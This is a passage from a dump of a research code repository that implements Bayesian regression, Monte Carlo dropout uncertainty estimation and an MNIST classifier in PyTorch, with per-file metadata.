np.log(np.linalg.det(posteriors[1])))\n\n\ndef hoge(x):\n return 0.01 * np.power(x, 2) + np.sin(x)\n\n\ndef main(args):\n N = args.num_data\n M = args.dim\n noise_var = args.noise_var\n data_range = (-1, 7)\n func = np.sin\n\n all_x = np.linspace(data_range[0] - 3, data_range[1] + 3, 100)\n\n xs, ys, features = create_dataset(N, M, data_range, func)\n\n fig, ax = plt.subplots()\n artists = []\n posterior_mean = np.zeros((1, M))\n posterior_var = np.identity(M)\n\n for i in range(1, N + 1):\n posterior_mean, posterior_var = posterior(features[i-1:i], ys[i-1:i],\n posterior_mean, posterior_var,\n noise_var)\n mean_star, min_star, max_star = predictive(all_x,\n posterior_mean, posterior_var,\n noise_var) \n\n plt.ylim(-5, 20)\n plt.plot(all_x, func(all_x), 'r')\n b = plt.plot(xs[:i], ys[:i], 'ro')\n a = plt.plot(all_x, mean_star, 'b')\n c = plt.plot(all_x, min_star, 'c--')\n d = plt.plot(all_x, max_star, 'c--')\n # plt.fill_between(all_x, min_star, max_star, alpha=0.2)\n artists.append(a + b + c + d)\n\n ani = anime.ArtistAnimation(fig, artists, interval=500, repeat_delay=1000)\n posterior_mean, posterior_var = posterior(features, ys,\n np.zeros((1, M)), np.identity(M),\n noise_var)\n print(evidence(ys, (np.zeros((1, M)), np.identity(M)), (posterior_mean, posterior_var), noise_var))\n plt.show()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Bayesian Logistic 
Regression')\n    parser.add_argument('--num_data', type=int, default=10,\n                        help='number of training data points')\n    parser.add_argument('--dim', type=int, default=5,\n                        help='dimension')\n    parser.add_argument('--noise_var', type=float, default=10,\n                        help='noise variance')\n\n    args = parser.parse_args()\n\n    main(args)\n"
},
{
"alpha_fraction": 0.5545023679733276,
"alphanum_fraction": 0.5639810562133789,
"avg_line_length": 19.899999618530273,
"blob_id": "0b3ad2958fe635778c23daf2b9c85bb8703633f5",
"content_id": "f25a7f6d54a8cd264e2d9c031cde99f2a41de484",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 211,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 10,
"path": "/mcdp/layers/misc.py",
"repo_name": "makora9143/bayes_uncertainty",
"src_encoding": "UTF-8",
"text": "import torch.nn as nn\n\n\nclass Flatten(nn.Module):\n def __init__(self):\n super(Flatten, self).__init__()\n\n def forward(self,x):\n batch_size = x.size(0)\n return x.view(batch_size, -1)\n\n\n"
},
{
"alpha_fraction": 0.7647058963775635,
"alphanum_fraction": 0.7647058963775635,
"avg_line_length": 16,
"blob_id": "bb8992c0a9a362e92feffc91913adf1f890bada9",
"content_id": "39ec62108cc208d167084ba36b1f4586b2ba3e90",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 27,
"license_type": "no_license",
"max_line_length": 16,
"num_lines": 1,
"path": "/README.md",
"repo_name": "makora9143/bayes_uncertainty",
"src_encoding": "UTF-8",
"text": "# Yarin Galの博論再現\n"
},
{
"alpha_fraction": 0.6499595642089844,
"alphanum_fraction": 0.6531932353973389,
"avg_line_length": 36.45454406738281,
"blob_id": "644ba63e14fa9831a7e96aa9e88f62bf644840d6",
"content_id": "9afaf2ba9c243f3e04585e1cf17490c5f11d2431",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1237,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 33,
"path": "/mcdp/loss.py",
"repo_name": "makora9143/bayes_uncertainty",
"src_encoding": "UTF-8",
"text": "import math\nimport torch\n\nfrom torch.nn.modules.loss import _Loss\n\n\ndef _assert_no_grad(tensor):\n assert not tensor.requires_grad, \\\n \"nn criterions don't compute the gradient w.r.t. targets - please \" \\\n \"mark these tensors as not requiring gradients\"\n\ndef gnll_loss(input, target, prec, size_average=True, reduce=True):\n return _pointwise_loss(lambda a, b, c: 0.5 * (math.log(2 * math.pi) - torch.log(c) + c * (a - b) ** 2), torch._C._nn.mse_loss,\n input, target, prec, size_average, reduce)\n\n\ndef _pointwise_loss(lambd, lambd_optimized, input, target, prec, size_average=True, reduce=True):\n if target.requires_grad:\n d = lambd(input, target, prec)\n if not reduce:\n return d\n return torch.mean(d) if size_average else torch.sum(d)\n else:\n return lambd_optimized(input, target, size_average, reduce)\n\n\nclass HeteroGaussianNLLLoss(_Loss):\n def __init__(self, size_average=True, reduce=True):\n super(HeteroGaussianNLLLoss, self).__init__(size_average, reduce)\n\n def forward(self, input, target, prec):\n _assert_no_grad(target)\n return gnll_loss(input, target, prec, size_average=self.size_average, reduce=self.reduce)\n\n"
},
{
"alpha_fraction": 0.6069997549057007,
"alphanum_fraction": 0.6195564866065979,
"avg_line_length": 33.33945083618164,
"blob_id": "009df8c41dcdfdf01442467fb5758cf510c19fb3",
"content_id": "8a711da879f621cb0c1e3ea27c851de6dd4e6f4c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3743,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 109,
"path": "/homo_regression.py",
"repo_name": "makora9143/bayes_uncertainty",
"src_encoding": "UTF-8",
"text": "import itertools\nimport argparse\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.utils.data as data\nfrom torch.autograd import Variable\n\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as anime\n\nfrom tqdm import tqdm\n\nfrom mcdp.models import MCDropoutReg\nfrom mcdp.dataset import PointDataset\n\n\ndef train_epoch(model, creterion, dataloader, optimizer):\n model.predict()\n losses = 0\n for x, y in dataloader:\n optimizer.zero_grad()\n x, y = Variable(x), Variable(y)\n mean = model(x)\n loss = creterion(mean, y)\n loss.backward()\n optimizer.step()\n losses += loss.data.item()\n return losses / len(dataloader)\n\ndef test(model, creterion, dataloader):\n model.mc()\n x, y = iter(dataloader).next()\n x, y = Variable(x), Variable(y)\n predict, var, result = model(x)\n loss = creterion(predict, y)\n return predict, var, result, loss.data.item()\n\n\ndef xsin(x):\n return x * torch.sin(x)\n\ndef main(args):\n\n train_dataset = PointDataset(args.N, low=-5, high=5, function=xsin)\n trainloader = data.DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True)\n\n test_dataset = PointDataset(low=-7, high=7, function=xsin)\n testloader = data.DataLoader(test_dataset, batch_size=len(test_dataset), shuffle=False)\n \n model = MCDropoutReg(args.drop_p, args.units, args.sampling)\n print(model)\n\n optimizer = optim.Adam(model.parameters(), weight_decay=args.lam)\n\n creterion = nn.MSELoss()\n\n artists = []\n fig, ax = plt.subplots()\n a = ax.plot(test_dataset.xs.numpy(), test_dataset.ys.numpy(), 'r')\n b = ax.plot(train_dataset.xs.numpy(), train_dataset.ys.numpy(), 'bo')\n\n \n pbar = tqdm(range(1, args.epochs + 1))\n\n for epoch in pbar:\n train_loss = train_epoch(model, creterion, trainloader, optimizer)\n mean, var, result, test_loss = test(model, creterion, testloader)\n std = torch.sqrt(var) + 2 * args.N * args.lam / (1 - args.drop_p) / 0.005\n c = ax.plot(test_dataset.xs.numpy(), mean.data.numpy(), 'b')\n d = ax.plot(test_dataset.xs.numpy(), (mean - std).data.numpy(), 'c--')\n e = ax.plot(test_dataset.xs.numpy(), (mean + std).data.numpy(), 'c--')\n f = ax.plot(test_dataset.xs.numpy(), result[0].data.numpy(), 'gray')\n # g = ax.fill_between(test_dataset.xs.numpy(),(mean - std).data.numpy().reshape(-1) , (mean + std).data.numpy().reshape(-1))\n\n artists.append(a + b + c + d + e + f )\n pbar.set_description('Epoch{}'.format(epoch))\n pbar.set_postfix(train=train_loss, test=test_loss)\n\n\n animation = anime.ArtistAnimation(fig, artists, interval=100, repeat_delay=1500)\n plt.show()\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description='ArgParser')\n\n parser.add_argument('--sampling', type=int, default=100,\n help='Number of sampling')\n parser.add_argument('--N', type=int, default=20,\n help='Number of data')\n parser.add_argument('--units', type=int, default=20,\n help='Number of hidden units')\n parser.add_argument('--lr', type=float, default=0.01,\n help='Learning rate')\n parser.add_argument('--batch_size', type=int, default=10,\n help='Batch size')\n parser.add_argument('--epochs', type=int, default=20,\n help='Epoch')\n parser.add_argument('--lam', type=float, default=0.00001,\n help='weight for L2 norm')\n parser.add_argument('--drop_p', type=float, default=0.05,\n help='dropout probability')\n\n args = parser.parse_args()\n main(args)\n"
},
{
"alpha_fraction": 0.5889337658882141,
"alphanum_fraction": 0.6072191596031189,
"avg_line_length": 32.959678649902344,
"blob_id": "2e50cfb767e09cbd7b16b7d3e15bbb82120845f9",
"content_id": "f421085c2e803f346463b3f4c47114b938b7cdaa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4211,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 124,
"path": "/hetero_regression.py",
"repo_name": "makora9143/bayes_uncertainty",
"src_encoding": "UTF-8",
"text": "import itertools\nimport argparse\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.utils.data as data\nfrom torch.autograd import Variable\n\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as anime\n\nfrom tqdm import tqdm\n\nfrom mcdp.models import HeteroMCDropoutReg\nfrom mcdp.dataset import PointDataset\nfrom mcdp.loss import HeteroGaussianNLLLoss\n\ndevice = 'cpu'\n\ndef train_epoch(model, creterion, dataloader, optimizer):\n global device\n model.predict()\n losses = 0\n for x, y in dataloader:\n optimizer.zero_grad()\n x, y = x.to(device), y.to(device)\n mean, sigma2 = model(x)\n loss = creterion(mean, y, 1./sigma2)\n loss.backward()\n optimizer.step()\n losses += loss.data.item()\n return losses / len(dataloader) / dataloader.batch_size\n\ndef test(model, dataloader):\n with torch.autograd.no_grad():\n model.mc()\n x, y = iter(dataloader).next()\n mean, var = model(x)\n return mean, torch.sqrt(var)\n\ndef xsin(x):\n return x * torch.sin(x)\n\ndef main(args):\n func = xsin\n\n train_dataset = PointDataset(args.N, function=func)\n trainloader = data.DataLoader(train_dataset, batch_size=args.batch_size, shuffle=False)\n\n test_dataset = PointDataset(low=-12, high=12, function=func)\n testloader = data.DataLoader(test_dataset, batch_size=len(test_dataset), shuffle=False)\n \n model = HeteroMCDropoutReg(args.drop_p, args.units, args.sampling)\n print(model)\n\n l2_decay = args.l2 * (1 - args.drop_p) / (2 * args.N)\n print('L2_decay =', l2_decay)\n\n optimizer = optim.SGD(model.parameters(), lr=0.001, weight_decay=l2_decay)\n # optimizer = optim.Adam(model.parameters(), weight_decay=l2_decay)\n\n # creterion = nn.MSELoss()\n creterion = HeteroGaussianNLLLoss()\n\n artists = []\n fig, ax = plt.subplots()\n ax.set_ylim(-10, 10)\n b = ax.plot(train_dataset.xs.numpy(), train_dataset.ys.numpy(), 'o', color='black')\n \n pbar = tqdm(range(1, args.epochs + 1))\n colors = ['steelblue', 'deepskyblue', 'lightskyblue', 'aliceblue']\n\n for epoch in pbar:\n train_loss = train_epoch(model, creterion, trainloader, optimizer)\n mean, std = test(model, testloader)\n\n c = ax.plot(test_dataset.xs.numpy(), mean.data.numpy(), 'b', linewidth=1.5)\n for i in range(0, 3):\n c += ax.plot(test_dataset.xs.numpy(),\n (mean - 2 * std * (i+1)/4).data.numpy(),\n '--', color=colors[i], linewidth=0.5)\n c += ax.plot(test_dataset.xs.numpy(),\n (mean + 2 * std * (i+1)/4).data.numpy(),\n '--', color=colors[i], linewidth=0.5)\n\n artists.append(b + c)\n pbar.set_description('Epoch {}'.format(epoch))\n pbar.set_postfix(train=train_loss)\n\n\n animation = anime.ArtistAnimation(fig, artists, interval=100, repeat_delay=1500)\n # animation.save('certainity_regression.gif', writer='imagemagick', fps=100)\n plt.show()\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description='ArgParser')\n\n parser.add_argument('--sampling', type=int, default=100,\n help='Number of sampling')\n parser.add_argument('--N', type=int, default=20,\n help='Number of data')\n parser.add_argument('--units', type=int, default=20,\n help='Number of hidden units')\n parser.add_argument('--lr', type=float, default=0.01,\n help='Learning rate')\n parser.add_argument('--batch_size', type=int, default=10,\n help='Batch size')\n parser.add_argument('--epochs', type=int, default=20,\n help='Epoch')\n parser.add_argument('--lam', type=float, default=0.00001,\n help='weight for L2 norm')\n parser.add_argument('--drop_p', type=float, default=0.05,\n 
help='dropout probability')\n    parser.add_argument('--l2', type=float, default=0.1,\n                        help='coefficient used to derive the L2 weight decay')\n\n    args = parser.parse_args()\n    device = torch.device('cpu')\n    main(args)\n"
},
{
"alpha_fraction": 0.47209876775741577,
"alphanum_fraction": 0.4995061755180359,
"avg_line_length": 25.457515716552734,
"blob_id": "d238e7363a260e1e86b782796ce75df5eb09263a",
"content_id": "1e6a6df9a61fe76c8d17e6d4e181ea47f2dc3e45",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4050,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 153,
"path": "/mcdp/models.py",
"repo_name": "makora9143/bayes_uncertainty",
"src_encoding": "UTF-8",
"text": "import itertools\n\nimport torch\nimport torch.nn as nn\n\nfrom .layers.linear import HeteroLinear\nfrom .layers.misc import Flatten\nfrom .layers.dropout import MCDropout\n\nclass MCDropoutReg(nn.Module):\n def __init__(self, drop_p=0.1, hidden=20, sampling=100):\n super(MCDropoutReg, self).__init__()\n self.net = nn.Sequential(\n\n # nn.Dropout(0.05),\n nn.Linear(1, hidden),\n nn.ReLU(),\n\n nn.Dropout(drop_p),\n nn.Linear(hidden, hidden),\n nn.Sigmoid(),\n\n nn.Dropout(drop_p),\n nn.Linear(hidden, 1)\n )\n \n self.sampling = sampling\n self.mc_flg = False\n\n def forward(self, x):\n if self.mc_flg:\n result = self.mc_forward(x)\n mean = torch.mean(result, 0)\n var = torch.mean(torch.pow(result, 2), 0) - torch.pow(mean, 2)\n return mean, var, result\n else:\n return self.net(x)\n\n def mc(self):\n self.mc_flg = True\n return self\n\n def predict(self):\n self.mc_flg = False\n return self\n\n def mc_forward(self, x):\n xs = itertools.repeat(x, self.sampling)\n result = torch.stack(list(map(self.net, xs)))\n return result\n\n\n\nclass HeteroMCDropoutReg(MCDropoutReg):\n def __init__(self, drop_p=0.1, hidden=20, sampling=100):\n super(HeteroMCDropoutReg, self).__init__(drop_p=0.1, hidden=20, sampling=100)\n self.net = nn.Sequential(\n # nn.Dropout(0.05),\n nn.Linear(1, hidden),\n nn.ReLU(),\n\n nn.Dropout(drop_p),\n nn.Linear(hidden, hidden),\n nn.Sigmoid(),\n\n nn.Dropout(drop_p),\n # nn.Linear(hidden, 2)\n HeteroLinear(hidden, 2),\n )\n\n def forward(self, x):\n if self.mc_flg:\n result = self.mc_forward(x)\n mc_mean, mc_sigma2 = self.separate(result)\n\n mean = torch.mean(mc_mean, 0)\n var = self.variance(mc_mean, mc_sigma2)\n\n return mean, var\n else:\n result = self.net(x)\n mean, sigma2 = self.separate(result)\n return mean, sigma2\n\n def separate(self, x):\n mean = x.index_select(-1, torch.LongTensor([0]))\n sigma2 = torch.exp(x.index_select(-1, torch.LongTensor([1])))\n return mean, sigma2\n\n\n def variance(self, mc_mean, mc_sigma2):\n exp_mean = torch.mean(mc_mean, 0)\n exp_sigma2 = torch.mean(mc_sigma2, 0)\n var = torch.mean(torch.pow(mc_mean, 2), 0) - torch.pow(exp_mean, 2) + exp_sigma2\n return var\n\n\nclass MCLeNet(MCDropoutReg):\n\n def __init__(self, drop_p=0.1, hidden=20, sampling=100):\n super(MCLeNet, self).__init__(drop_p=0.1, hidden=20, sampling=100)\n\n self.net = nn.Sequential(\n nn.Conv2d(1, 20, 5, 1),\n nn.ReLU(),\n nn.MaxPool2d(2, 2),\n\n nn.Conv2d(20, 50, 5, 1),\n nn.ReLU(),\n nn.MaxPool2d(2, 2),\n\n Flatten(),\n \n nn.Linear(50* 4 * 4, 500),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(500, 10),\n nn.LogSoftmax(-1)\n )\n\n def forward(self, x):\n if self.mc_flg:\n result = self.mc_forward(x)\n else:\n result = self.net(x)\n return result\n\n\nclass BNNet(nn.Module):\n def __init__(self, p=0.5, l=1, L=4, hidden=10):\n super(Net, self).__init__()\n\n self.net = nn.ModuleList()\n \n self.net.append(nn.Sequential(\n PriorLinear(1, hidden, l),\n nn.ReLU(),\n MCDropout(p),\n )\n )\n\n for i in range(L-1):\n tmp = nn.Sequential(\n PriorLinear(hidden, hidden, l),\n nn.ReLU(),\n MCDropout(p)\n )\n self.net.append(tmp)\n\n self.net.append(PriorLinear(hidden, 1, l))\n\n def forward(self, x):\n return self.net(x)\n\n\n"
},
{
"alpha_fraction": 0.7464212775230408,
"alphanum_fraction": 0.7791411280632019,
"avg_line_length": 47.900001525878906,
"blob_id": "af28524c3bb982cb97701d8ea6ca2ddfebfad3d2",
"content_id": "0b06e275e7516b882443c410067ae70dd4662e98",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 489,
"license_type": "no_license",
"max_line_length": 180,
"num_lines": 10,
"path": "/grad_test.py",
"repo_name": "makora9143/bayes_uncertainty",
"src_encoding": "UTF-8",
"text": "import torch\nfrom torch.autograd import Variable\nfrom torch.autograd import gradcheck\nfrom mcdp.heterolayer import HeteroLinearFunction, LinearFunction\n\ninput = (Variable(torch.randn(60,20).double(), requires_grad=True), Variable(torch.randn(2,20).double(), requires_grad=True),Variable(torch.randn(2,).double(), requires_grad=True))\n# test = gradcheck(LinearFunction.apply, input, eps=1e-6, atol=1e-4)\ntest = gradcheck(HeteroLinearFunction.apply, input, eps=1e-6, atol=1e-4)\n\nprint(test)\n"
},
{
"alpha_fraction": 0.49167823791503906,
"alphanum_fraction": 0.5367544889450073,
"avg_line_length": 21.184616088867188,
"blob_id": "d7809ee324107691a0ab02ba1173ef2f26d52548",
"content_id": "9783be5356c6e6fb8ee8c5cce3c81a131ee7febb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1442,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 65,
"path": "/bnn_sample.py",
"repo_name": "makora9143/bayes_uncertainty",
"src_encoding": "UTF-8",
"text": "import torch\nimport torch.nn as nn\nfrom mcdp.layers.dropout import MCDropout\nfrom mcdp.layers.linear import GaussianLinear\n\nimport matplotlib.pyplot as plt\n\n\nparams = {\n \"ReLU\": [[1, 10], [32, 512, 4096]],\n \"Tanh\": [[1, 10], [32, 512, 4096]],\n \"Sigmoid\": [[0.1, 1], [32, 512, 4096]]\n}\n\nactivations = {\n \"ReLU\": nn.ReLU,\n \"Tanh\": nn.Tanh,\n \"Sigmoid\": nn.Sigmoid\n}\n\n\ndef plot(l, k, func, idx):\n activation = activations[func]\n\n drop = nn.Sequential(\n GaussianLinear(1, k, l),\n activation(),\n MCDropout(), \n GaussianLinear(k, k, l),\n activation(),\n MCDropout(), \n GaussianLinear(k, k, l),\n activation(),\n MCDropout(), \n GaussianLinear(k, 1, l)\n )\n\n x = torch.linspace(-2, 2, 100).view(-1, 1)\n\n drop.eval()\n tmp = []\n for i in range(20):\n y = drop(x)\n tmp.append(y)\n plt.subplot(6, 3, idx)\n plt.plot(x.detach().numpy(), y.detach().numpy(), 'c', linewidth=0.3)\n plt.title('{}, l:{}, k:{}'.format(func, l, k))\n y_mean = torch.mean(torch.cat(tmp, 1), 1).view(-1, 1)\n plt.plot(x.detach().numpy(), y_mean.detach().numpy(), 'b', linewidth=1.0)\n\nplt.subplots_adjust(wspace=0.4, hspace=0.6)\n\nfor i, (activation, params) in enumerate(params.items(), 1):\n ls, ks = params\n j = 0\n for k in ks:\n for l in ls:\n plot(l, k, activation, i + (3 * j))\n\n j += 1\n\n\n\n\nplt.show()\n"
},
{
"alpha_fraction": 0.534983217716217,
"alphanum_fraction": 0.56981360912323,
"avg_line_length": 29.27777862548828,
"blob_id": "2d6899aa1de6219b965945c7933ad8012b7c7106",
"content_id": "8f389e55fff7c01c92c997923811122024bb3ab9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3273,
"license_type": "no_license",
"max_line_length": 138,
"num_lines": 108,
"path": "/bnn_regression.py",
"repo_name": "makora9143/bayes_uncertainty",
"src_encoding": "UTF-8",
"text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.utils.data as data\nfrom torch.autograd import Variable\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom mcdp.layers.dropout import MCDropout\nfrom mcdp.layers.linear import GaussianLinear\n\n\ndef f(x, train=False):\n if train:\n eps = np.random.normal(0, 0.3, x.shape)\n else:\n eps = 0\n # return x * (np.sin(-2*(x+2) + eps) - x * 4 * np.sin(3*(x+ eps)) + eps - np.cos(3 * x))\n return x * (np.sin(-2*(x+2)) - x * 4 * np.sin(3*(x)) + eps - np.cos(3 * x))\n\nclass PointDataset(data.Dataset):\n def __init__(self):\n super(PointDataset, self).__init__()\n\n train_x = np.random.uniform(-2, -0.5, (2000, 1)).astype('float32')\n train_x3 = np.random.uniform(0.3, 0.7, (1000, 1)).astype('float32')\n train_x2 = np.random.uniform(1.5, 2, (2000, 1)).astype('float32')\n train_x = np.concatenate([train_x, train_x3, train_x2], 0)\n train_y = f(train_x, True).astype('float32')\n\n self.train_x, self.train_y = torch.from_numpy(train_x), torch.from_numpy(train_y)\n\n def __len__(self):\n return self.train_x.size(0)\n\n def __getitem__(self, index):\n return self.train_x[index].view(1), self.train_y[index].view(1)\n\n\nclass Model(nn.Module):\n def __init__(self, l, k, L, activation, p=0.5):\n super(Model, self).__init__()\n\n self.net = nn.Sequential(\n # MCDropout(0.5),\n GaussianLinear(1, k, l),\n activation(),\n MCDropout(p),\n )\n for i in range(L):\n self.net.add_module('({})'.format(i+1),\n nn.Sequential(\n GaussianLinear(k, k, l),\n activation(),\n MCDropout(p),\n ))\n self.net.add_module('{}'.format(L+1), GaussianLinear(k, 1, l))\n\n def forward(self, x):\n return self.net(x)\n\n\ntrue_x = np.linspace(-2, 2, 5000)\ntrue_y = f(true_x)\n\ntrain_dataset = PointDataset()\nloader = data.DataLoader(train_dataset, batch_size=32, shuffle=True)\n\ntest_x = torch.linspace(-4, 4, 400).view(-1, 1)\n\nmodel = Model(5, 1024, 4, nn.ReLU)\nprint(model)\noptimizer = optim.Adam(model.parameters(), weight_decay=25 * 0.5 / 2 / 5000 / 10, amsgrad=True)\ncreterion = nn.MSELoss()\n\nepochs = 10\nbatch_size = 32\n\nfor epoch in range(epochs):\n losses = 0\n for x, y in loader:\n optimizer.zero_grad()\n pred = model(x)\n loss = creterion(pred, y)\n loss.backward()\n optimizer.step()\n losses += loss.item()\n print(epoch, losses / len(loader))\n\n\n\nmodel.eval()\ntmp = []\nfor i in range(10):\n tmp.append(model(test_x))\ntotal = torch.cat(tmp, 1)\ntest_y = total.mean(1)\n\nvar = torch.pow(total, 2).mean(1) - torch.pow(test_y, 2)\nstd = torch.sqrt(var)\n\n# plt.plot(train_dataset.train_x.detach().numpy(), train_dataset.train_y.detach().numpy(), 'gx', linewidth=0.1)\n# plt.plot(true_x, true_y, 'b-')\nplt.plot(test_x.detach().numpy(), test_y.detach().numpy(),'b')\nplt.fill_between(test_x.detach().numpy().reshape(-1), (test_y - 2 * std).detach().numpy(), (test_y + 2 * std).detach().numpy(), alpha=0.2)\nplt.show()\n\n\n\n"
},
{
"alpha_fraction": 0.5114555358886719,
"alphanum_fraction": 0.5336927175521851,
"avg_line_length": 28.65999984741211,
"blob_id": "25574d72ad03ba48a01becd3b5f60dbbab879f31",
"content_id": "0863abaf5caa0f0f2380cd3d31112e3bf8834571",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1484,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 50,
"path": "/mcdp/dataset.py",
"repo_name": "makora9143/bayes_uncertainty",
"src_encoding": "UTF-8",
"text": "import torch\nimport torch.utils.data as data\n\nclass PointDataset(data.Dataset):\n def __init__(self, N=None, low=-1, high=7, function=torch.sin, noise=False):\n super(PointDataset, self).__init__()\n\n self.N = N\n self.function = function\n\n self.low = low\n self.high = high\n self.noise = noise\n\n # self.xs, self.ys = self.sample()\n self.xs, self.ys = self.reproduce_sample()\n\n def __len__(self):\n return self.xs.size(0)\n\n def __getitem__(self, index):\n assert index <= len(self), 'index range error'\n\n x, y = self.xs[index].view(1), self.ys[index].view(1)\n\n return x, y\n\n def sample(self):\n if self.N is None:\n xs = torch.arange(self.low, self.high, (self.high - self.low) / 140)\n else:\n xs = torch.rand(self.N).uniform_(self.low, self.high)\n ys = self.function(xs)\n\n if self.noise:\n ys += torch.rand(ys.size()).normal_(0, 0.01)\n\n return xs, ys\n\n def reproduce_sample(self):\n if self.N is None:\n xs = torch.arange(self.low, self.high, (self.high - self.low) / 200)\n ys = self.function(xs)\n else:\n xs = torch.FloatTensor([1. * i / (self.N - 5) * 10 - 5 for i in range(self.N - 4)])\n ys = self.function(xs)\n\n xs = torch.FloatTensor(xs.tolist() + [7, 8.5, 10, 11.5])\n ys = torch.FloatTensor(ys.tolist() + [-7, 7, -7, 7])\n return xs, ys\n\n"
},
{
"alpha_fraction": 0.5647754669189453,
"alphanum_fraction": 0.5838107466697693,
"avg_line_length": 33.90967559814453,
"blob_id": "fecc2eac1567848ed2c4edf5c1771207bba38f6c",
"content_id": "1f3f84c1f4a228c23253c5de034a981e700e73d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5411,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 155,
"path": "/bnn_classification.py",
"repo_name": "makora9143/bayes_uncertainty",
"src_encoding": "UTF-8",
"text": "import pickle\nimport math\nimport argparse\n\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.utils.data as data\nfrom torchvision import datasets, transforms\nfrom torch.autograd import Variable\n\nfrom tqdm import tqdm\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\n\nfrom mcdp.models import MCLeNet\n\n\n\ndef train(epoch, model, dataloader, creterion, optimizer, use_cuda=False):\n model.predict()\n\n pbar = tqdm(dataloader)\n losses = 0\n pbar.set_description('Epoch {}'.format(epoch))\n for x, y in pbar:\n if use_cuda:\n x, y = x.cuda(), y.cuda()\n x, y = Variable(x), Variable(y)\n optimizer.zero_grad()\n predict = model(x)\n loss = F.nll_loss(predict, y)\n loss.backward()\n optimizer.step()\n losses += loss.data.item()\n pbar.set_postfix(loss=math.exp(loss.data.item()))\n return losses / len(dataloader.dataset)\n\ndef test(model, creterion, dataloader, use_cuda=False):\n # model.mc()\n\n test_loss = 0\n correct = 0\n pbar = tqdm(dataloader)\n for x, y in pbar:\n with torch.no_grad():\n x, y = Variable(x), Variable(y)\n if use_cuda:\n x, y = x.cuda(), y.cuda()\n mean = model(x)\n loss = creterion(mean, y)\n test_loss += math.exp(loss.data.item())\n pbar.set_postfix(loss=math.exp(loss.data.item()))\n pred = mean.data.max(1, keepdim=True)[1] # get the index of the max log-probability\n correct += pred.eq(y.data.view_as(pred)).long().cpu().sum()\n\n test_loss /= len(dataloader.dataset)\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n test_loss, correct, len(dataloader.dataset),\n 100. * correct / len(dataloader.dataset)))\n \ndef scatter(output, labels=[1, 5, 7]):\n sample = output.shape[0]\n num_img = output.shape[1]\n x = np.array([list(range(num_img))] * sample).T.reshape(-1)\n # plt.figure(figsize=(12, 9))\n y = output[:, :, 1].T.reshape(-1,)\n plt.scatter(x, y, s=1500, marker='_', alpha=0.3, label='1')\n y = output[:, :, 5].T.reshape(-1,)\n plt.scatter(x, y, s=1000, marker='_', c='orange', alpha=0.3, label='5')\n y = output[:, :, 7].T.reshape(-1,)\n plt.scatter(x, y, s=1000, marker='_', c='green', alpha=0.3, label='7')\n plt.legend(loc='center right')\n plt.savefig('classification_uncertainity.png')\n\ndef main(args):\n\n kwargs = {'num_workers': 1, 'pin_memory': True} if args.cuda else {}\n train_loader = torch.utils.data.DataLoader(\n datasets.MNIST('~/data/mnist/', train=True, download=False,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=args.batch_size, shuffle=True, **kwargs)\n\n test_loader = torch.utils.data.DataLoader(\n datasets.MNIST('~/data/mnist/', train=False, transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=args.batch_size, shuffle=True, **kwargs)\n\n with open('./test_img.pkl', 'rb') as f:\n data_dict = pickle.load(f)\n\n model = MCLeNet()\n if args.cuda:\n print('use cuda')\n model.cuda()\n\n l2_decay = args.l2 * (1 - args.drop_p) / (2 * args.N)\n print('L2_decay =', l2_decay)\n\n optimizer = optim.SGD(model.parameters(), lr=args.lr, weight_decay=l2_decay)\n\n creterion = nn.NLLLoss()\n\n for epoch in range(1, args.epochs+1):\n losses = train(epoch, model, train_loader, creterion, optimizer, args.cuda)\n test(model, creterion, test_loader, args.cuda)\n\n toy_data = Variable(data_dict['tensor']).cuda() if args.cuda else Variable(data_dict['tensor'])\n model.mc()\n 
